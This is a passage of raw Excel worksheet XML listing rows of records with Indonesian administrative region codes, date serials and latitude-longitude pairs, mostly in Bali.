        <v>18005</v>
      </c>
      <c r="W3937" s="5">
        <v>-83347765</v>
      </c>
      <c r="X3937" t="s">
        <v>21736</v>
      </c>
      <c r="Y3937" t="str">
        <f t="shared" si="61"/>
        <v>-8.3347765,115.6356377</v>
      </c>
    </row>
    <row r="3938" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3938">
        <v>298666</v>
      </c>
      <c r="B3938" s="1">
        <v>44488</v>
      </c>
      <c r="C3938" t="s">
        <v>13174</v>
      </c>
      <c r="D3938" t="s">
        <v>22</v>
      </c>
      <c r="E3938" t="s">
        <v>23</v>
      </c>
      <c r="F3938" t="s">
        <v>13175</v>
      </c>
      <c r="G3938" t="s">
        <v>13176</v>
      </c>
      <c r="H3938" t="s">
        <v>7086</v>
      </c>
      <c r="I3938" t="s">
        <v>7421</v>
      </c>
      <c r="J3938" t="s">
        <v>7277</v>
      </c>
      <c r="L3938" t="s">
        <v>13177</v>
      </c>
      <c r="M3938">
        <v>5102080006</v>
      </c>
      <c r="N3938">
        <v>5102080</v>
      </c>
      <c r="O3938">
        <v>5102</v>
      </c>
      <c r="P3938">
        <v>51</v>
      </c>
      <c r="Q3938" t="s">
        <v>13154</v>
      </c>
      <c r="R3938" t="s">
        <v>13155</v>
      </c>
      <c r="S3938" t="s">
        <v>13156</v>
      </c>
      <c r="T3938" t="s">
        <v>7282</v>
      </c>
      <c r="U3938" s="5">
        <v>1150909518</v>
      </c>
      <c r="V3938" s="5" t="s">
        <v>18006</v>
      </c>
      <c r="W3938" s="5">
        <v>-83303001</v>
      </c>
      <c r="X3938" t="s">
        <v>21737</v>
      </c>
      <c r="Y3938" t="str">
        <f t="shared" si="61"/>
        <v>-8.3303001,115.0909518</v>
      </c>
    </row>
    <row r="3939" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3939">
        <v>298648</v>
      </c>
      <c r="B3939" s="1">
        <v>44488</v>
      </c>
      <c r="C3939" t="s">
        <v>13178</v>
      </c>
      <c r="D3939" t="s">
        <v>22</v>
      </c>
      <c r="E3939" t="s">
        <v>23</v>
      </c>
      <c r="F3939" t="s">
        <v>13179</v>
      </c>
      <c r="H3939" t="s">
        <v>7086</v>
      </c>
      <c r="I3939" t="s">
        <v>7087</v>
      </c>
      <c r="J3939" t="s">
        <v>7277</v>
      </c>
      <c r="L3939" t="s">
        <v>13180</v>
      </c>
      <c r="M3939">
        <v>5107050013</v>
      </c>
      <c r="N3939">
        <v>5107050</v>
      </c>
      <c r="O3939">
        <v>5107</v>
      </c>
      <c r="P3939">
        <v>51</v>
      </c>
      <c r="Q3939" t="s">
        <v>13168</v>
      </c>
      <c r="R3939" t="s">
        <v>13121</v>
      </c>
      <c r="S3939" t="s">
        <v>13106</v>
      </c>
      <c r="T3939" t="s">
        <v>7282</v>
      </c>
      <c r="U3939" s="5">
        <v>1156892967</v>
      </c>
      <c r="V3939" s="5" t="s">
        <v>18007</v>
      </c>
      <c r="W3939" s="5">
        <v>-83553706</v>
      </c>
      <c r="X3939" t="s">
        <v>21738</v>
      </c>
      <c r="Y3939" t="str">
        <f t="shared" si="61"/>
        <v>-8.3553706,115.6892967</v>
      </c>
    </row>
    <row r="3940" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3940">
        <v>298665</v>
      </c>
      <c r="B3940" s="1">
        <v>44488</v>
      </c>
      <c r="C3940" t="s">
        <v>13181</v>
      </c>
      <c r="D3940" t="s">
        <v>22</v>
      </c>
      <c r="E3940" t="s">
        <v>23</v>
      </c>
      <c r="F3940" t="s">
        <v>13182</v>
      </c>
      <c r="G3940" t="s">
        <v>13183</v>
      </c>
      <c r="H3940" t="s">
        <v>7086</v>
      </c>
      <c r="I3940" t="s">
        <v>7087</v>
      </c>
      <c r="J3940" t="s">
        <v>7277</v>
      </c>
      <c r="L3940" t="s">
        <v>13184</v>
      </c>
      <c r="M3940">
        <v>5106040027</v>
      </c>
      <c r="N3940">
        <v>5106040</v>
      </c>
      <c r="O3940">
        <v>5106</v>
      </c>
      <c r="P3940">
        <v>51</v>
      </c>
      <c r="Q3940" t="s">
        <v>13185</v>
      </c>
      <c r="R3940" t="s">
        <v>13186</v>
      </c>
      <c r="S3940" t="s">
        <v>13187</v>
      </c>
      <c r="T3940" t="s">
        <v>7282</v>
      </c>
      <c r="U3940" s="5">
        <v>1153333875</v>
      </c>
      <c r="V3940" s="5" t="s">
        <v>18008</v>
      </c>
      <c r="W3940" s="5">
        <v>-82509465</v>
      </c>
      <c r="X3940" t="s">
        <v>21739</v>
      </c>
      <c r="Y3940" t="str">
        <f t="shared" si="61"/>
        <v>-8.2509465,115.3333875</v>
      </c>
    </row>
    <row r="3941" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3941">
        <v>298640</v>
      </c>
      <c r="B3941" s="1">
        <v>44488</v>
      </c>
      <c r="C3941" t="s">
        <v>13188</v>
      </c>
      <c r="D3941" t="s">
        <v>22</v>
      </c>
      <c r="E3941" t="s">
        <v>23</v>
      </c>
      <c r="F3941" t="s">
        <v>13189</v>
      </c>
      <c r="H3941" t="s">
        <v>7086</v>
      </c>
      <c r="I3941" t="s">
        <v>7733</v>
      </c>
      <c r="J3941" t="s">
        <v>7277</v>
      </c>
      <c r="L3941" t="s">
        <v>13190</v>
      </c>
      <c r="M3941">
        <v>5107050012</v>
      </c>
      <c r="N3941">
        <v>5107050</v>
      </c>
      <c r="O3941">
        <v>5107</v>
      </c>
      <c r="P3941">
        <v>51</v>
      </c>
      <c r="Q3941" t="s">
        <v>13173</v>
      </c>
      <c r="R3941" t="s">
        <v>13121</v>
      </c>
      <c r="S3941" t="s">
        <v>13106</v>
      </c>
      <c r="T3941" t="s">
        <v>7282</v>
      </c>
      <c r="U3941" s="5">
        <v>1156323079</v>
      </c>
      <c r="V3941" s="5" t="s">
        <v>18009</v>
      </c>
      <c r="W3941" s="5">
        <v>-83321822</v>
      </c>
      <c r="X3941" t="s">
        <v>21740</v>
      </c>
      <c r="Y3941" t="str">
        <f t="shared" si="61"/>
        <v>-8.3321822,115.6323079</v>
      </c>
    </row>
    <row r="3942" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3942">
        <v>298583</v>
      </c>
      <c r="B3942" s="1">
        <v>44488</v>
      </c>
      <c r="C3942" t="s">
        <v>13191</v>
      </c>
      <c r="D3942" t="s">
        <v>22</v>
      </c>
      <c r="E3942" t="s">
        <v>23</v>
      </c>
      <c r="F3942" t="s">
        <v>13192</v>
      </c>
      <c r="H3942" t="s">
        <v>7086</v>
      </c>
      <c r="I3942" t="s">
        <v>12222</v>
      </c>
      <c r="J3942" t="s">
        <v>7277</v>
      </c>
      <c r="L3942" t="s">
        <v>13193</v>
      </c>
      <c r="M3942">
        <v>5107050008</v>
      </c>
      <c r="N3942">
        <v>5107050</v>
      </c>
      <c r="O3942">
        <v>5107</v>
      </c>
      <c r="P3942">
        <v>51</v>
      </c>
      <c r="Q3942" t="s">
        <v>13160</v>
      </c>
      <c r="R3942" t="s">
        <v>13121</v>
      </c>
      <c r="S3942" t="s">
        <v>13106</v>
      </c>
      <c r="T3942" t="s">
        <v>7282</v>
      </c>
      <c r="U3942" s="5">
        <v>1156156325</v>
      </c>
      <c r="V3942" s="5" t="s">
        <v>18010</v>
      </c>
      <c r="W3942" s="5">
        <v>-83582897</v>
      </c>
      <c r="X3942" t="s">
        <v>21741</v>
      </c>
      <c r="Y3942" t="str">
        <f t="shared" si="61"/>
        <v>-8.3582897,115.6156325</v>
      </c>
    </row>
    <row r="3943" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3943">
        <v>298559</v>
      </c>
      <c r="B3943" s="1">
        <v>44488</v>
      </c>
      <c r="C3943" t="s">
        <v>13194</v>
      </c>
      <c r="D3943" t="s">
        <v>22</v>
      </c>
      <c r="E3943" t="s">
        <v>23</v>
      </c>
      <c r="F3943" t="s">
        <v>13195</v>
      </c>
      <c r="G3943" t="s">
        <v>13196</v>
      </c>
      <c r="H3943" t="s">
        <v>7086</v>
      </c>
      <c r="I3943" t="s">
        <v>9331</v>
      </c>
      <c r="J3943" t="s">
        <v>7277</v>
      </c>
      <c r="L3943" t="s">
        <v>13197</v>
      </c>
      <c r="M3943">
        <v>5107030007</v>
      </c>
      <c r="N3943">
        <v>5107030</v>
      </c>
      <c r="O3943">
        <v>5107</v>
      </c>
      <c r="P3943">
        <v>51</v>
      </c>
      <c r="Q3943" t="s">
        <v>13198</v>
      </c>
      <c r="R3943" t="s">
        <v>13199</v>
      </c>
      <c r="S3943" t="s">
        <v>13106</v>
      </c>
      <c r="T3943" t="s">
        <v>7282</v>
      </c>
      <c r="U3943" s="5">
        <v>1155476601</v>
      </c>
      <c r="V3943" s="5" t="s">
        <v>18011</v>
      </c>
      <c r="W3943" s="5">
        <v>-84597397</v>
      </c>
      <c r="X3943" t="s">
        <v>21742</v>
      </c>
      <c r="Y3943" t="str">
        <f t="shared" si="61"/>
        <v>-8.4597397,115.5476601</v>
      </c>
    </row>
    <row r="3944" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3944">
        <v>298574</v>
      </c>
      <c r="B3944" s="1">
        <v>44488</v>
      </c>
      <c r="C3944" t="s">
        <v>13200</v>
      </c>
      <c r="D3944" t="s">
        <v>22</v>
      </c>
      <c r="E3944" t="s">
        <v>23</v>
      </c>
      <c r="F3944" t="s">
        <v>13201</v>
      </c>
      <c r="G3944" t="s">
        <v>13202</v>
      </c>
      <c r="H3944" t="s">
        <v>7086</v>
      </c>
      <c r="I3944" t="s">
        <v>12486</v>
      </c>
      <c r="J3944" t="s">
        <v>7277</v>
      </c>
      <c r="L3944" t="s">
        <v>13203</v>
      </c>
      <c r="M3944">
        <v>5107050010</v>
      </c>
      <c r="N3944">
        <v>5107050</v>
      </c>
      <c r="O3944">
        <v>5107</v>
      </c>
      <c r="P3944">
        <v>51</v>
      </c>
      <c r="Q3944" t="s">
        <v>13120</v>
      </c>
      <c r="R3944" t="s">
        <v>13121</v>
      </c>
      <c r="S3944" t="s">
        <v>13106</v>
      </c>
      <c r="T3944" t="s">
        <v>7282</v>
      </c>
      <c r="U3944" s="5">
        <v>1155579758</v>
      </c>
      <c r="V3944" s="5" t="s">
        <v>18012</v>
      </c>
      <c r="W3944" s="5">
        <v>-83460293</v>
      </c>
      <c r="X3944" t="s">
        <v>21743</v>
      </c>
      <c r="Y3944" t="str">
        <f t="shared" si="61"/>
        <v>-8.3460293,115.5579758</v>
      </c>
    </row>
    <row r="3945" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3945">
        <v>298624</v>
      </c>
      <c r="B3945" s="1">
        <v>44488</v>
      </c>
      <c r="C3945" t="s">
        <v>13204</v>
      </c>
      <c r="D3945" t="s">
        <v>22</v>
      </c>
      <c r="E3945" t="s">
        <v>23</v>
      </c>
      <c r="F3945" t="s">
        <v>13205</v>
      </c>
      <c r="H3945" t="s">
        <v>7086</v>
      </c>
      <c r="I3945" t="s">
        <v>12293</v>
      </c>
      <c r="J3945" t="s">
        <v>7277</v>
      </c>
      <c r="L3945" t="s">
        <v>13206</v>
      </c>
      <c r="M3945">
        <v>5107050013</v>
      </c>
      <c r="N3945">
        <v>5107050</v>
      </c>
      <c r="O3945">
        <v>5107</v>
      </c>
      <c r="P3945">
        <v>51</v>
      </c>
      <c r="Q3945" t="s">
        <v>13168</v>
      </c>
      <c r="R3945" t="s">
        <v>13121</v>
      </c>
      <c r="S3945" t="s">
        <v>13106</v>
      </c>
      <c r="T3945" t="s">
        <v>7282</v>
      </c>
      <c r="U3945" s="5">
        <v>1156994280</v>
      </c>
      <c r="V3945" s="5" t="s">
        <v>18013</v>
      </c>
      <c r="W3945" s="5">
        <v>-83692473</v>
      </c>
      <c r="X3945" t="s">
        <v>21744</v>
      </c>
      <c r="Y3945" t="str">
        <f t="shared" si="61"/>
        <v>-8.3692473,115.6994280</v>
      </c>
    </row>
    <row r="3946" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3946">
        <v>298646</v>
      </c>
      <c r="B3946" s="1">
        <v>44488</v>
      </c>
      <c r="C3946" t="s">
        <v>13207</v>
      </c>
      <c r="D3946" t="s">
        <v>22</v>
      </c>
      <c r="E3946" t="s">
        <v>23</v>
      </c>
      <c r="F3946" t="s">
        <v>13208</v>
      </c>
      <c r="G3946" t="s">
        <v>13209</v>
      </c>
      <c r="H3946" t="s">
        <v>7086</v>
      </c>
      <c r="I3946" t="s">
        <v>7087</v>
      </c>
      <c r="J3946" t="s">
        <v>7277</v>
      </c>
      <c r="L3946" t="s">
        <v>13210</v>
      </c>
      <c r="M3946">
        <v>5106040022</v>
      </c>
      <c r="N3946">
        <v>5106040</v>
      </c>
      <c r="O3946">
        <v>5106</v>
      </c>
      <c r="P3946">
        <v>51</v>
      </c>
      <c r="Q3946" t="s">
        <v>13211</v>
      </c>
      <c r="R3946" t="s">
        <v>13186</v>
      </c>
      <c r="S3946" t="s">
        <v>13187</v>
      </c>
      <c r="T3946" t="s">
        <v>7282</v>
      </c>
      <c r="U3946" s="5">
        <v>1154261705</v>
      </c>
      <c r="V3946" s="5" t="s">
        <v>18014</v>
      </c>
      <c r="W3946" s="5">
        <v>-82525563</v>
      </c>
      <c r="X3946" t="s">
        <v>21745</v>
      </c>
      <c r="Y3946" t="str">
        <f t="shared" si="61"/>
        <v>-8.2525563,115.4261705</v>
      </c>
    </row>
    <row r="3947" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3947">
        <v>298595</v>
      </c>
      <c r="B3947" s="1">
        <v>44488</v>
      </c>
      <c r="C3947" t="s">
        <v>13212</v>
      </c>
      <c r="D3947" t="s">
        <v>22</v>
      </c>
      <c r="E3947" t="s">
        <v>23</v>
      </c>
      <c r="F3947" t="s">
        <v>13213</v>
      </c>
      <c r="G3947" t="s">
        <v>13214</v>
      </c>
      <c r="H3947" t="s">
        <v>7086</v>
      </c>
      <c r="I3947" t="s">
        <v>7733</v>
      </c>
      <c r="J3947" t="s">
        <v>7277</v>
      </c>
      <c r="L3947" t="s">
        <v>13215</v>
      </c>
      <c r="M3947">
        <v>5107050014</v>
      </c>
      <c r="N3947">
        <v>5107050</v>
      </c>
      <c r="O3947">
        <v>5107</v>
      </c>
      <c r="P3947">
        <v>51</v>
      </c>
      <c r="Q3947" t="s">
        <v>13216</v>
      </c>
      <c r="R3947" t="s">
        <v>13121</v>
      </c>
      <c r="S3947" t="s">
        <v>13106</v>
      </c>
      <c r="T3947" t="s">
        <v>7282</v>
      </c>
      <c r="U3947" s="5">
        <v>1156174994</v>
      </c>
      <c r="V3947" s="5" t="s">
        <v>18015</v>
      </c>
      <c r="W3947" s="5">
        <v>-83862377</v>
      </c>
      <c r="X3947" t="s">
        <v>21746</v>
      </c>
      <c r="Y3947" t="str">
        <f t="shared" si="61"/>
        <v>-8.3862377,115.6174994</v>
      </c>
    </row>
    <row r="3948" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3948">
        <v>298596</v>
      </c>
      <c r="B3948" s="1">
        <v>44488</v>
      </c>
      <c r="C3948" t="s">
        <v>13217</v>
      </c>
      <c r="D3948" t="s">
        <v>22</v>
      </c>
      <c r="E3948" t="s">
        <v>23</v>
      </c>
      <c r="F3948" t="s">
        <v>13218</v>
      </c>
      <c r="G3948" t="s">
        <v>13219</v>
      </c>
      <c r="H3948" t="s">
        <v>7086</v>
      </c>
      <c r="I3948" t="s">
        <v>7733</v>
      </c>
      <c r="J3948" t="s">
        <v>7277</v>
      </c>
      <c r="L3948" t="s">
        <v>13215</v>
      </c>
      <c r="M3948">
        <v>5107050014</v>
      </c>
      <c r="N3948">
        <v>5107050</v>
      </c>
      <c r="O3948">
        <v>5107</v>
      </c>
      <c r="P3948">
        <v>51</v>
      </c>
      <c r="Q3948" t="s">
        <v>13216</v>
      </c>
      <c r="R3948" t="s">
        <v>13121</v>
      </c>
      <c r="S3948" t="s">
        <v>13106</v>
      </c>
      <c r="T3948" t="s">
        <v>7282</v>
      </c>
      <c r="U3948" s="5">
        <v>1156175081</v>
      </c>
      <c r="V3948" s="5" t="s">
        <v>18016</v>
      </c>
      <c r="W3948" s="5">
        <v>-83862429</v>
      </c>
      <c r="X3948" t="s">
        <v>21747</v>
      </c>
      <c r="Y3948" t="str">
        <f t="shared" si="61"/>
        <v>-8.3862429,115.6175081</v>
      </c>
    </row>
    <row r="3949" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3949">
        <v>298575</v>
      </c>
      <c r="B3949" s="1">
        <v>44488</v>
      </c>
      <c r="C3949" t="s">
        <v>13220</v>
      </c>
      <c r="D3949" t="s">
        <v>22</v>
      </c>
      <c r="E3949" t="s">
        <v>23</v>
      </c>
      <c r="F3949" t="s">
        <v>13221</v>
      </c>
      <c r="G3949" t="s">
        <v>13222</v>
      </c>
      <c r="H3949" t="s">
        <v>7086</v>
      </c>
      <c r="I3949" t="s">
        <v>7087</v>
      </c>
      <c r="J3949" t="s">
        <v>7277</v>
      </c>
      <c r="L3949" t="s">
        <v>13223</v>
      </c>
      <c r="M3949">
        <v>5107050008</v>
      </c>
      <c r="N3949">
        <v>5107050</v>
      </c>
      <c r="O3949">
        <v>5107</v>
      </c>
      <c r="P3949">
        <v>51</v>
      </c>
      <c r="Q3949" t="s">
        <v>13160</v>
      </c>
      <c r="R3949" t="s">
        <v>13121</v>
      </c>
      <c r="S3949" t="s">
        <v>13106</v>
      </c>
      <c r="T3949" t="s">
        <v>7282</v>
      </c>
      <c r="U3949" s="5">
        <v>1156139912</v>
      </c>
      <c r="V3949" s="5" t="s">
        <v>18017</v>
      </c>
      <c r="W3949" s="5">
        <v>-83501821</v>
      </c>
      <c r="X3949" t="s">
        <v>21748</v>
      </c>
      <c r="Y3949" t="str">
        <f t="shared" si="61"/>
        <v>-8.3501821,115.6139912</v>
      </c>
    </row>
    <row r="3950" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3950">
        <v>298552</v>
      </c>
      <c r="B3950" s="1">
        <v>44488</v>
      </c>
      <c r="C3950" t="s">
        <v>13224</v>
      </c>
      <c r="D3950" t="s">
        <v>22</v>
      </c>
      <c r="E3950" t="s">
        <v>23</v>
      </c>
      <c r="F3950" t="s">
        <v>13225</v>
      </c>
      <c r="G3950" t="s">
        <v>13226</v>
      </c>
      <c r="H3950" t="s">
        <v>7086</v>
      </c>
      <c r="I3950" t="s">
        <v>10341</v>
      </c>
      <c r="J3950" t="s">
        <v>7277</v>
      </c>
      <c r="L3950" t="s">
        <v>13227</v>
      </c>
      <c r="M3950">
        <v>5107050008</v>
      </c>
      <c r="N3950">
        <v>5107050</v>
      </c>
      <c r="O3950">
        <v>5107</v>
      </c>
      <c r="P3950">
        <v>51</v>
      </c>
      <c r="Q3950" t="s">
        <v>13160</v>
      </c>
      <c r="R3950" t="s">
        <v>13121</v>
      </c>
      <c r="S3950" t="s">
        <v>13106</v>
      </c>
      <c r="T3950" t="s">
        <v>7282</v>
      </c>
      <c r="U3950" s="5">
        <v>1156145436</v>
      </c>
      <c r="V3950" s="5" t="s">
        <v>18018</v>
      </c>
      <c r="W3950" s="5">
        <v>-83495801</v>
      </c>
      <c r="X3950" t="s">
        <v>21749</v>
      </c>
      <c r="Y3950" t="str">
        <f t="shared" si="61"/>
        <v>-8.3495801,115.6145436</v>
      </c>
    </row>
    <row r="3951" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3951">
        <v>298579</v>
      </c>
      <c r="B3951" s="1">
        <v>44488</v>
      </c>
      <c r="C3951" t="s">
        <v>13228</v>
      </c>
      <c r="D3951" t="s">
        <v>22</v>
      </c>
      <c r="E3951" t="s">
        <v>23</v>
      </c>
      <c r="F3951" t="s">
        <v>13229</v>
      </c>
      <c r="G3951" t="s">
        <v>13230</v>
      </c>
      <c r="H3951" t="s">
        <v>7086</v>
      </c>
      <c r="I3951" t="s">
        <v>7733</v>
      </c>
      <c r="J3951" t="s">
        <v>7277</v>
      </c>
      <c r="L3951" t="s">
        <v>13231</v>
      </c>
      <c r="M3951">
        <v>5107050011</v>
      </c>
      <c r="N3951">
        <v>5107050</v>
      </c>
      <c r="O3951">
        <v>5107</v>
      </c>
      <c r="P3951">
        <v>51</v>
      </c>
      <c r="Q3951" t="s">
        <v>13232</v>
      </c>
      <c r="R3951" t="s">
        <v>13121</v>
      </c>
      <c r="S3951" t="s">
        <v>13106</v>
      </c>
      <c r="T3951" t="s">
        <v>7282</v>
      </c>
      <c r="U3951" s="5">
        <v>1156145382</v>
      </c>
      <c r="V3951" s="5" t="s">
        <v>18019</v>
      </c>
      <c r="W3951" s="5">
        <v>-83312102</v>
      </c>
      <c r="X3951" t="s">
        <v>21750</v>
      </c>
      <c r="Y3951" t="str">
        <f t="shared" si="61"/>
        <v>-8.3312102,115.6145382</v>
      </c>
    </row>
    <row r="3952" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3952">
        <v>298591</v>
      </c>
      <c r="B3952" s="1">
        <v>44488</v>
      </c>
      <c r="C3952" t="s">
        <v>13233</v>
      </c>
      <c r="D3952" t="s">
        <v>22</v>
      </c>
      <c r="E3952" t="s">
        <v>23</v>
      </c>
      <c r="F3952" t="s">
        <v>13234</v>
      </c>
      <c r="H3952" t="s">
        <v>7086</v>
      </c>
      <c r="I3952" t="s">
        <v>13235</v>
      </c>
      <c r="J3952" t="s">
        <v>7277</v>
      </c>
      <c r="L3952" t="s">
        <v>13236</v>
      </c>
      <c r="M3952">
        <v>5107050009</v>
      </c>
      <c r="N3952">
        <v>5107050</v>
      </c>
      <c r="O3952">
        <v>5107</v>
      </c>
      <c r="P3952">
        <v>51</v>
      </c>
      <c r="Q3952" t="s">
        <v>13125</v>
      </c>
      <c r="R3952" t="s">
        <v>13121</v>
      </c>
      <c r="S3952" t="s">
        <v>13106</v>
      </c>
      <c r="T3952" t="s">
        <v>7282</v>
      </c>
      <c r="U3952" s="5">
        <v>1156145382</v>
      </c>
      <c r="V3952" s="5" t="s">
        <v>18019</v>
      </c>
      <c r="W3952" s="5">
        <v>-83468998</v>
      </c>
      <c r="X3952" t="s">
        <v>21751</v>
      </c>
      <c r="Y3952" t="str">
        <f t="shared" si="61"/>
        <v>-8.3468998,115.6145382</v>
      </c>
    </row>
    <row r="3953" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3953">
        <v>298561</v>
      </c>
      <c r="B3953" s="1">
        <v>44488</v>
      </c>
      <c r="C3953" t="s">
        <v>13237</v>
      </c>
      <c r="D3953" t="s">
        <v>22</v>
      </c>
      <c r="E3953" t="s">
        <v>23</v>
      </c>
      <c r="F3953" t="s">
        <v>13238</v>
      </c>
      <c r="G3953" t="s">
        <v>13239</v>
      </c>
      <c r="H3953" t="s">
        <v>7086</v>
      </c>
      <c r="I3953" t="s">
        <v>13240</v>
      </c>
      <c r="J3953" t="s">
        <v>7277</v>
      </c>
      <c r="L3953" t="s">
        <v>13241</v>
      </c>
      <c r="M3953">
        <v>5102080006</v>
      </c>
      <c r="N3953">
        <v>5102080</v>
      </c>
      <c r="O3953">
        <v>5102</v>
      </c>
      <c r="P3953">
        <v>51</v>
      </c>
      <c r="Q3953" t="s">
        <v>13154</v>
      </c>
      <c r="R3953" t="s">
        <v>13155</v>
      </c>
      <c r="S3953" t="s">
        <v>13156</v>
      </c>
      <c r="T3953" t="s">
        <v>7282</v>
      </c>
      <c r="U3953" s="5">
        <v>1150906384</v>
      </c>
      <c r="V3953" s="5" t="s">
        <v>18001</v>
      </c>
      <c r="W3953" s="5">
        <v>-83304990</v>
      </c>
      <c r="X3953" t="s">
        <v>21732</v>
      </c>
      <c r="Y3953" t="str">
        <f t="shared" si="61"/>
        <v>-8.3304990,115.0906384</v>
      </c>
    </row>
    <row r="3954" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3954">
        <v>298571</v>
      </c>
      <c r="B3954" s="1">
        <v>44488</v>
      </c>
      <c r="C3954" t="s">
        <v>13242</v>
      </c>
      <c r="D3954" t="s">
        <v>22</v>
      </c>
      <c r="E3954" t="s">
        <v>23</v>
      </c>
      <c r="F3954" t="s">
        <v>13243</v>
      </c>
      <c r="H3954" t="s">
        <v>7086</v>
      </c>
      <c r="I3954" t="s">
        <v>12245</v>
      </c>
      <c r="J3954" t="s">
        <v>7277</v>
      </c>
      <c r="L3954" t="s">
        <v>13244</v>
      </c>
      <c r="M3954">
        <v>5107050011</v>
      </c>
      <c r="N3954">
        <v>5107050</v>
      </c>
      <c r="O3954">
        <v>5107</v>
      </c>
      <c r="P3954">
        <v>51</v>
      </c>
      <c r="Q3954" t="s">
        <v>13232</v>
      </c>
      <c r="R3954" t="s">
        <v>13121</v>
      </c>
      <c r="S3954" t="s">
        <v>13106</v>
      </c>
      <c r="T3954" t="s">
        <v>7282</v>
      </c>
      <c r="U3954" s="5">
        <v>1156126714</v>
      </c>
      <c r="V3954" s="5" t="s">
        <v>18020</v>
      </c>
      <c r="W3954" s="5">
        <v>-83333758</v>
      </c>
      <c r="X3954" t="s">
        <v>21752</v>
      </c>
      <c r="Y3954" t="str">
        <f t="shared" si="61"/>
        <v>-8.3333758,115.6126714</v>
      </c>
    </row>
    <row r="3955" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3955">
        <v>298588</v>
      </c>
      <c r="B3955" s="1">
        <v>44488</v>
      </c>
      <c r="C3955" t="s">
        <v>13245</v>
      </c>
      <c r="D3955" t="s">
        <v>22</v>
      </c>
      <c r="E3955" t="s">
        <v>23</v>
      </c>
      <c r="F3955" t="s">
        <v>13246</v>
      </c>
      <c r="G3955" t="s">
        <v>13247</v>
      </c>
      <c r="H3955" t="s">
        <v>7086</v>
      </c>
      <c r="I3955" t="s">
        <v>13248</v>
      </c>
      <c r="J3955" t="s">
        <v>7277</v>
      </c>
      <c r="L3955" t="s">
        <v>13249</v>
      </c>
      <c r="M3955">
        <v>5105020002</v>
      </c>
      <c r="N3955">
        <v>5105020</v>
      </c>
      <c r="O3955">
        <v>5105</v>
      </c>
      <c r="P3955">
        <v>51</v>
      </c>
      <c r="Q3955" t="s">
        <v>13250</v>
      </c>
      <c r="R3955" t="s">
        <v>13251</v>
      </c>
      <c r="S3955" t="s">
        <v>13252</v>
      </c>
      <c r="T3955" t="s">
        <v>7282</v>
      </c>
      <c r="U3955" s="5">
        <v>1153838007</v>
      </c>
      <c r="V3955" s="5" t="s">
        <v>18021</v>
      </c>
      <c r="W3955" s="5">
        <v>-85660030</v>
      </c>
      <c r="X3955" t="s">
        <v>21753</v>
      </c>
      <c r="Y3955" t="str">
        <f t="shared" si="61"/>
        <v>-8.5660030,115.3838007</v>
      </c>
    </row>
    <row r="3956" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3956">
        <v>298602</v>
      </c>
      <c r="B3956" s="1">
        <v>44488</v>
      </c>
      <c r="C3956" t="s">
        <v>13253</v>
      </c>
      <c r="D3956" t="s">
        <v>22</v>
      </c>
      <c r="E3956" t="s">
        <v>23</v>
      </c>
      <c r="F3956" t="s">
        <v>13254</v>
      </c>
      <c r="H3956" t="s">
        <v>7086</v>
      </c>
      <c r="I3956" t="s">
        <v>7629</v>
      </c>
      <c r="J3956" t="s">
        <v>13255</v>
      </c>
      <c r="L3956" t="s">
        <v>13256</v>
      </c>
      <c r="M3956">
        <v>3173080002</v>
      </c>
      <c r="N3956">
        <v>3173080</v>
      </c>
      <c r="O3956">
        <v>3173</v>
      </c>
      <c r="P3956">
        <v>31</v>
      </c>
      <c r="Q3956" t="s">
        <v>6480</v>
      </c>
      <c r="R3956" t="s">
        <v>157</v>
      </c>
      <c r="S3956" t="s">
        <v>62</v>
      </c>
      <c r="T3956" t="s">
        <v>33</v>
      </c>
      <c r="U3956" s="5">
        <v>1068139060</v>
      </c>
      <c r="V3956" s="5" t="s">
        <v>18022</v>
      </c>
      <c r="W3956" s="5">
        <v>-61803147</v>
      </c>
      <c r="X3956" t="s">
        <v>21754</v>
      </c>
      <c r="Y3956" t="str">
        <f t="shared" si="61"/>
        <v>-6.1803147,106.8139060</v>
      </c>
    </row>
    <row r="3957" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3957">
        <v>298622</v>
      </c>
      <c r="B3957" s="1">
        <v>44488</v>
      </c>
      <c r="C3957" t="s">
        <v>13257</v>
      </c>
      <c r="D3957" t="s">
        <v>22</v>
      </c>
      <c r="E3957" t="s">
        <v>23</v>
      </c>
      <c r="F3957" t="s">
        <v>13258</v>
      </c>
      <c r="G3957" t="s">
        <v>13259</v>
      </c>
      <c r="H3957" t="s">
        <v>7086</v>
      </c>
      <c r="I3957" t="s">
        <v>12245</v>
      </c>
      <c r="J3957" t="s">
        <v>7277</v>
      </c>
      <c r="L3957" t="s">
        <v>13260</v>
      </c>
      <c r="M3957">
        <v>5107050012</v>
      </c>
      <c r="N3957">
        <v>5107050</v>
      </c>
      <c r="O3957">
        <v>5107</v>
      </c>
      <c r="P3957">
        <v>51</v>
      </c>
      <c r="Q3957" t="s">
        <v>13173</v>
      </c>
      <c r="R3957" t="s">
        <v>13121</v>
      </c>
      <c r="S3957" t="s">
        <v>13106</v>
      </c>
      <c r="T3957" t="s">
        <v>7282</v>
      </c>
      <c r="U3957" s="5">
        <v>1156220380</v>
      </c>
      <c r="V3957" s="5" t="s">
        <v>18023</v>
      </c>
      <c r="W3957" s="5">
        <v>-83435500</v>
      </c>
      <c r="X3957" t="s">
        <v>21755</v>
      </c>
      <c r="Y3957" t="str">
        <f t="shared" si="61"/>
        <v>-8.3435500,115.6220380</v>
      </c>
    </row>
    <row r="3958" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3958">
        <v>298637</v>
      </c>
      <c r="B3958" s="1">
        <v>44488</v>
      </c>
      <c r="C3958" t="s">
        <v>13261</v>
      </c>
      <c r="D3958" t="s">
